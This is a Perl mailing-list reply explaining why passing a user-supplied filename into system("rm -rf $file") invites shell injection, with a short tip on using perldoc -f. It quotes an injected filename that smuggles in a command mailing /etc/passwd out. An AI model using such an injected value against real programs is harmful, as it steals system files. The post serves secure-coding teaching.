On Jan 12, Gary Hawkins said:
>> system("rm -rf $file");
>>
>> But if you copied this from another source, that source was totally
>> unaware that deletion of files like THAT is TOTALLY unsafe. A safer
>> approach is:
>>
>> system("rm", "-rf", $file);
>
>I'm not aware of the reason for it.
Multi-arg system() bypasses the shell. Assume that $file comes from user
input. What would happen if the user entered
foo; mail [EMAIL PROTECTED] < /etc/passwd
when prompted for a filename? You would then blindly run
system("rm -rf $file");
which would execute
rm -rf foo;
mail [EMAIL PROTECTED] < /etc/passwd
which would happily email me your passwd file. Ick for you.
Multi-arg system treats the program to execute as though it were a
function itself -- it safely executes 'rm' with two arguments, the flags
(-rf) and the filename (foo; mail [EMAIL PROTECTED] < /etc/passwd). This,
of course, would fail, unless you HAPPENED to have a file named "foo; mail
[EMAIL PROTECTED] < /etc/passwd", which would be truly bizarre.
>What's a good way to find which perl doc contains the thing I need to read
>about?
>
>This will prolly make me look stupider than I wasn't to be of something then
>of, but:
>
>C:\>perldoc system
>No documentation found for "system".
You need to better familiarize yourself with the perldoc utility.
friday:~ $ perldoc
Usage: perldoc [-h] [-r] [-i] [-v] [-t] [-u] [-m] [-l] [-F] [-X]
PageName|ModuleName|ProgramName
perldoc -f PerlFunc
perldoc -q FAQKeywords
The -h option prints more help. Also try "perldoc perldoc" to get
aquainted with the system.
>From that message, you see that you should have invoked 'perldoc -f
system' instead.
--
Jeff "japhy" Pinyan [EMAIL PROTECTED] http://www.pobox.com/~japhy/
RPI Acacia brother #734 http://www.perlmonks.org/ http://www.cpan.org/
** Look for "Regular Expressions in Perl" published by Manning, in 2002 **
<stu> what does y/// stand for? <tenderpuss> why, yansliterate of course.
--
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
